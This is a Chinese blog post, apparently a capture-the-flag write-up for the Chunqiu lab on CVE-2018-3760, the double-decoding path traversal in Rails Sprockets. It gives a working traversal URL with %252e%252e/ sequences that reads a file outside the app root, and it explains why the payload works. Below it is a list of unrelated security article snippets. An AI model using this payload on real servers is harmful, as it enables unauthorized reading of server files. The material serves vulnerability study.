春秋云境CVE-2018-3760

最新推荐文章于 2026-06-22 14:38:51 发布
原创 最新推荐文章于 2026-06-22 14:38:51 发布 · 430 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#CVE-2018-3760 #web安全 #春秋云境 #安全 #网络安全

1.阅读靶场介绍

可以使用特制的请求来访问存在于应用程序根目录之外的文件系统上的文件

这句话简单来说就是

对url做手脚哟

2.启动靶场

如下图所示

3.poc

直接构造如下的url

https://eci-2zei9aluohdz2xjnhint.cloudeci1.ichunqiu.com:80/assets/file:%2F%2F/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/flag

到这里我们就可以完成夺旗了哟

4.原理

Ruby On Rails 是著名的 Ruby Web 开发框架,它在开发环境中使用 Sprockets 作为静态文件服务器。Sprockets 是一个编译和分发静态资源文件的 Ruby 库。Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞。攻击者可以%252e%252e/用来访问根目录并读取或执行目标服务器上的任何文件,../第一次转码:%2E%2E/,因为%也要进行二次编码,第二次编码就是:%252e%252e/。
本质上就是../../../../../的二次转码版本哟

喜欢您能喜欢我的文章

感谢你宝贵的时间

Chockmans
关注
CVE-2018-3760漏洞复现(任意文件读取)
千寻的博客
01-07 4603
CVE-2018-3760漏洞复现(任意文件读取) 0x00 漏洞介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 0x...
复现CVE-2018-3760——Rails sprockets 任意文件读取漏洞
记录并分享学习安全的知识点..
10-04 907
Ruby On Rails在开发环下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。
春秋CVE-2025-58360
Chockmans的博客
02-10 414
根据提示启动靶场,然后在url后面添加/geoserver/web去到关键路径。这是靶场的页面,原地刷新用bp抓包,这里是为了获得host值。一般还有一个步骤就是信息收集(资产、突破点、指纹等等)关键路径/geoserver/web。哈哈哈,这里小弟想起了发信息给女朋友。然后在等待得到自己想要信息的画面了。这里看到的信息大致就是xxe注入。剩下的内容都是小弟直接构造出来的。同时也期待你们的一键三连的哈哈哈。这里我们就可以得到flag了。其实小弟除了期待女朋友的信息。此情此景是不是大相径庭呢。
2026年6月第4周网络安全形势周报
Bruce_xiaowei的博客
06-20 788
本周全球网络安全态势呈"AI资产定向收割 + 关基漏洞集中曝光 + 国内执法高压震慑AI资产成为新攻击靶标:诺和诺德遭FulcrumSec定向勒索,1.3TB数据(含"蜻蜓"AI模型全栈权重、临床数据)失窃,2500万美元赎金遭拒,标志AI研发资产首次成为制药行业的核心攻击目标。KEV目录新增2个高危在野利用漏洞。
Web安全二阶段综合测试:知识点速查与实战技巧
weixin_50769372的博客
06-16 377
本文为Web安全学习二阶段综合测试指南,涵盖五大核心漏洞模块:1. 文件上传漏洞:服务器未严格校验文件类型/内容,防御需签名验证、随机重命名、白名单限制;2. 弱口令漏洞:简单密码易被破解,应强制密码复杂度并禁用默认密码;3. XSS漏洞:分反射型、存储型、DOM型,需输入过滤与输出编码;4. XXE漏洞:XML解析器允许恶意外部实体,应禁用外部实体解析;5. 综合漏洞:包括SQL注入、CSRF等攻击手法。提供实操解题思路(如爆破登录、越权攻击)和DOM型XSS五种绕过方式,最终培养学员信息收集、漏洞挖掘、
瑞士网络安全法律与实践
网络研究观
06-17 230
瑞士是一个由26个联邦州(州)和一个联邦政府组成的联邦制国家。这导致了瑞士法律体系的层级化,以及有时分散的官方网络安全策略。瑞士的网络安全与数据保护领域密切相关。网络安全通常被视为数据安全的衍生领域,甚至是其同义词。顾名思义,数据安全旨在保障数据处理和存储活动的安全性和弹性。
美国网络安全趋势与发展
网络研究观
06-15 327
对于希望构建具有弹性的系统并以现实和优先的方式应对或最大限度减少这些攻击影响的公司而言,了解这些相互关联的趋势和发展、它们的普遍性和它们的潜在影响至关重要。
墨西哥网络安全法律与实践
网络研究观
06-17 373
墨西哥没有专门的网络安全法,但多项法律条文间接地规范着这一领域,涉及多个监管机构。例如,有关于银行业、个人数据保护、犯罪行为和电信的法规。这些法律通过提供机构和企业必须遵守的框架来保护数字资产和个人信息,从而塑造了网络安全格局。
aklang(YAK)网络安全领域编程语言
aovenus的专栏-测试新时代(微信公众号:测试新时代)
06-15 333
Yaklang 是中国首款开源网络安全领域编程语言,用一门语言覆盖渗透测试、漏洞研究、代码审计、企业安全建设等全场景,目标是将安全能力标准化、融合化、自动化,让安全从业者从"拼装各种异构工具"中解放出来,专注于真正的高价值安全工作。
网络安全等级保护(等保2.0)全面解析:从“被罚款“到“过测评“,这篇8000字把等保讲透了!(PPT)
专注数字化解决方案,每日更新精选报告。关注「无忧智库」,与你共探数智未来,日进一步。
06-22 364
第一句:对信息系统,分等级保护——系统越重要,防护要求越高;第二句:对信息安全产品,分等级管理——不同等级系统要用符合要求的安全产品;第三句:对信息安全事件,分等级响应处置——事件发生后,按等级启动不同强度的应对机制。核心精神:系统重要程度有多高,安全保护就应当有多强,既不能保护不足,也不能过度保护。这种"适度安全"的理念是等级保护最重要的思想精髓——一个小型乡镇管理系统,和一个全国联网的银行核心系统,绝不能套用同一套安全标准。信息系统本身:按等级分类、定级、建设、测评安全产品。
【架构实战】安全架构设计:让攻击者无从下手
分享技术应用、实践场景等,评论区开放技术难题讨论,共同成长进步。
06-18 304
安全架构的关键要点:纵深防御:不要依赖单一安全措施,多层防护默认安全安全应该是默认配置,不是可选功能最小权限:只授予必要的权限,不过度授权日志审计:所有操作都要有日志,方便溯源定期渗透测试:请专业团队定期做渗透测试安全培训:提高全员安全意识不要觉得"这只是内部接口"就不做安全。攻击者永远比你想象的更执着。你们系统有哪些接口可能存在安全漏洞?如果发现系统在遭受攻击,你能在几分钟内止血?个人观点,仅供参考。
网络安全】nmap端口扫描软件
最新发布
sumengnan的博客
06-22 246
nmap(全称Network Mapper)是一款开源免费的网络探测和安全审核工具。网络管理员和安全专家常用它来扫描大型网络,执行主机探测、端口扫描、操作系统指纹识别及漏洞审计。
Cyberworld科明大同 携 Claroty、i-TRACING、Cohesity 亮相 2026 上交会,共筑工控网络安全防线
weixin_51025220的博客
06-22 203
2026年上海国际技术进出口交易会上,Cyberworld科明大同联合Claroty、i-TRACING、Cohesity三大国际厂商,展示了智能制造网络安全解决方案。方案聚焦工控安全、应急响应和数据管理三大领域:Claroty提供覆盖600+协议的资产发现与实时防护,i-TRACING提供7×24小时OT事件响应服务,Cohesity则通过AI驱动实现勒索软件防护与快速数据恢复。这些技术共同构建了覆盖产线全生命周期的安全防护体系,助力制造业应对数字化转型中的网络威胁。
网络安全】hydra命令
sumengnan的博客
06-22 245
hydra是一款用于合法授权的密码强度测试和账户安全审计的开源工具,可以对多种网络协议进行登录验证测试。常用于渗透测试和安全评估。
Claude 网络安全实测:AI 攻防能力正在从聊天走向执行
AI 小老六的博客
06-22 163
Claude 的竞赛表现显示,工具化模型正在改写安全攻防边界。
传统组网 VS SASE 架构:全球化软件企业网络安全改造痛点解析
NOVAnet2023的博客
06-17 497
全球化布局的软件企业分支节点多、跨域流量复杂,传统 MPLS、IPSec VPN 架构逐渐暴露稳定性差、运维难、安全薄弱等问题。本文梳理改造前典型痛点,对比新旧架构差异,分析全球化企业网络升级方向。
《渗透测试工程师(高级)》证书有什么用?工信教考中心报考全攻略
06-18 267
在护网行动、红蓝对抗中,持证渗透测试工程师往往是团队核心。某安全公司员工小李,考取渗透测试工程师(高级)后,被公司列为重点项目负责人,年终奖翻倍。:证书课程涵盖OWASP Top 10、SQL注入、XSS、CSRF等实战技术,考试通过即代表具备高级渗透能力。:许多安全服务项目明确要求项目经理或技术负责人持有工信教考中心渗透测试工程师证书。在网络安全攻防对抗日益激烈的今天,渗透测试工程师是企业防御体系中的“尖刀兵”。:年满18周岁,专科及以上学历,计算机相关专业,2年以上安全相关工作经验。
2026年全球网络安全指南:法律与实践、趋势与发展合集
网络研究观
06-15 583
该指南提供有关网络安全法律法规的最新信息,包括关键基础设施、金融行业运营韧性、网络韧性和信息通信技术认证等方面的内容。此外,该指南还探讨了网络安全与数据保护法的交叉领域,以及人工智能和医疗保健监管的最新发展。
网络安全第125天
m0_74741186的博客
06-22 24
那就是过waf的就是sql注入,其实就是需要本地的就是可以执行的,所以就是要在本地就是可以执行的,然后就是过waf的操作自己想,但是自己就是学了sql注入,但是自己就是还是不会,但是就是没有实际动手操作就是少了。就是没有复盘,每天不应该复盘为啥自己挖不到洞吗,就是没有思路,所以你自己就是盲目挖洞,就是以后前一天就是要写就是明天要干啥,但是这个月要过完了。然后就是想就是要想这个逻辑,然后就是一个网站就是看一眼就走了,每个方法都是要尝试,然后去做,累了,困了,睡觉了。然后就是学习新知识,复盘。
深度拆解网络安全“闭环”之王——APPDRR模型
聚焦网络信息安全,拆解网信原理与技术
06-15 550
面对日益复杂的网络威胁,传统PDR/PPDR模型已显不足,APPDRR模型正成为头部企业的安全新标准。该模型包含六大动态闭环环节:评估(持续风险识别)、预防(提高攻击成本)、防护(纵深技术防御)、检测(快速威胁发现)、响应(紧急事件处置)和恢复(业务韧性重建)。其核心创新在于将安全从静态防护转为动态生存能力体系,强调攻击前中后的全过程管理,通过持续循环改进构建企业安全韧性。模型特别突出风险评估的精准性和恢复能力的关键价值,推动安全思维从"绝对防御"向"快速复原"转变。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值